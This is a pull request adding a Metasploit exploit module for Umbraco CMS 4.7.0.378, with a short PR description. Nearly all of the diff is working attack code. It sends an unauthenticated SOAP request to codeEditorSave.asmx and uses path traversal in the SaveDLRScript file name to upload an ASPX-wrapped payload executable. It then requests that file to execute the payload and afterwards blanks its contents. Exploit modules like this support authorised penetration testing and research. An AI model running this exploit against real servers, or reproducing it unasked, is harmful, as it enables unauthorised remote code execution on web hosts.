### PR TITLE
added umbraco_upload_aspx.rb for Umbraco CMS 4.7.0.378

### DIFF
--- a/modules/exploits/windows/http/umbraco_upload_aspx.rb
+++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb
@@ -1,0 +1,167 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::EXE
+
+	def initialize
+		super(
+			'Name'        	=> 'Umbraco CMS Remote Command Execution',
+			'Description'   => %q{
+					This module can be used to execute a payload on Umbraco CMS 
+				4.7.0.378. The payload is uploaded as an ASPX script by 
+				sending a specially crafted SOAP request to codeEditorSave.asmx, 
+				which permits unauthorised file upload via the SaveDLRScript operation. 
+				SaveDLRScript is also subject to a path traversal vulnerability,  
+				allowing code to be placed into the web-accessible /umbraco/ directory.
+				
+				The module writes, executes and then overwrites an ASPX script; note that 
+				though the script content is removed, the file remains on the target.
+			},
+			'Author'      => [
+				'Toby Clarke' # Module based heavily upon Juan Vazquez's 'landesk_thinkmanagement_upload_asp.rb' 
+			],
+			'Version'     => '$Revision: $',
+			'Platform'    => 'win',
+			'References'  =>
+				[
+				],
+			'Targets'     =>
+				[
+					[ 'Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1', { } ],
+				],
+			'DefaultTarget'  => 0,
+			'Privileged'     => false,
+			'DisclosureDate' => 'Jun 28 2012'
+		)
+
+		register_options(
+			[
+				OptString.new('PATH', [ true,  "The URI path of the Umbraco login page", '/umbraco'])
+			], self.class)
+	end
+
+	def exploit
+
+		peer = "#{rhost}:#{rport}"
+
+		# Generate the ASPX containing the EXE containing the payload
+		exe = generate_payload_exe
+		aspx = Msf::Util::EXE.to_exe_aspx(exe)
+
+		# htmlentities like encoding
+		aspx = aspx.gsub("&", "&amp;").gsub("\"", "&quot;").gsub("'", "&#039;").gsub("<", "&lt;").gsub(">", "&gt;")
+
+		uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/")
+		upload_random = rand_text_alpha(rand(6) + 6)
+
+		soap = <<-eos
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <SaveDLRScript xmlns="http://tempuri.org/">
+      <fileName>/..\\..\\..\\umbraco\\#{upload_random}.aspx</fileName>
+      <oldName>string</oldName>
+      <fileContents>#{aspx}</fileContents>
+      <ignoreDebugging>1</ignoreDebugging>
+    </SaveDLRScript>
+  </soap:Body>
+</soap:Envelope>
+		eos
+
+		#
+		# UPLOAD
+		#
+		
+		attack_url = uri_path + "webservices/codeEditorSave.asmx"
+		print_status("#{peer} - Uploading #{aspx.length} bytes through #{attack_url}...")
+		print_status("#{peer} - Uploading to #{uri_path}#{upload_random}.aspx")
+
+		res = send_request_cgi({
+			'uri'          => attack_url,
+			'method'       => 'POST',
+			'ctype'        => 'text/xml; charset=utf-8',
+			'headers'	=> {
+					'SOAPAction'     => "\"http://tempuri.org/SaveDLRScript\"",
+				},
+			'data'         => soap,
+		}, 20)
+
+		if (! res)
+			print_status("#{peer} - Timeout: Trying to execute the payload anyway")
+		elsif (res.code = 500)
+			print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]")
+		end
+
+		#
+		# EXECUTE
+		#
+		
+		upload_path = uri_path + "#{upload_random}.aspx"
+		print_status("#{peer} - Executing #{upload_path}...")
+
+		res = send_request_cgi({
+			'uri'          =>  upload_path,
+			'method'       => 'GET'
+		}, 20)
+
+		if (! res)
+			print_error("#{peer} - Execution failed on #{upload_path} [No Response]")
+			return
+		end
+
+		if (res.code < 200 or res.code >= 300)
+			print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]")
+			return
+		end
+
+		#
+		# 'DELETE' - note that the file will remain on the system, but the content will be wiped.
+		#
+
+		soap = <<-eos
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <SaveDLRScript xmlns="http://tempuri.org/">
+      <fileName>/..\\..\\..\\umbraco\\#{upload_random}.aspx</fileName>
+      <oldName>string</oldName>
+      <fileContents></fileContents>
+      <ignoreDebugging>1</ignoreDebugging>
+    </SaveDLRScript>
+  </soap:Body>
+</soap:Envelope>
+		eos
+
+		attack_url = uri_path + "webservices/codeEditorSave.asmx"
+		print_status("#{peer} - Writing #{aspx.length} bytes through #{attack_url}...")
+		print_status("#{peer} - Wrting over #{uri_path}#{upload_random}.aspx")
+
+		res = send_request_cgi({
+			'uri'          => attack_url,
+			'method'       => 'POST',
+			'ctype'        => 'text/xml; charset=utf-8',
+			'headers'	=> {
+					'SOAPAction'     => "\"http://tempuri.org/SaveDLRScript\"",
+				},
+			'data'         => soap,
+		}, 20)
+
+		if (! res)
+			print_error("#{peer} - Deletion failed at #{attack_url} [No Response]")
+			return
+		elsif (res.code = 500)
+			print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]")
+		end
+		handler
+	end
+end


### PR DESCRIPTION
Umbraco 4.7.0 unauthenticated file upload 

This module can be used to execute a payload on Umbraco CMS 4.7.0. The payload is uploaded as an ASPX script by sending a specially crafted SOAP request.

Tested on Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1.

Described in detail here: http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html

Testing notes:

Umbraco source is here: http://umbraco.codeplex.com/

Umbraco 4.7.0 can be obtained here: http://umbraco.codeplex.com/releases/view/62573 (look for the 'Umbraco 4.7.0 binaries' link).
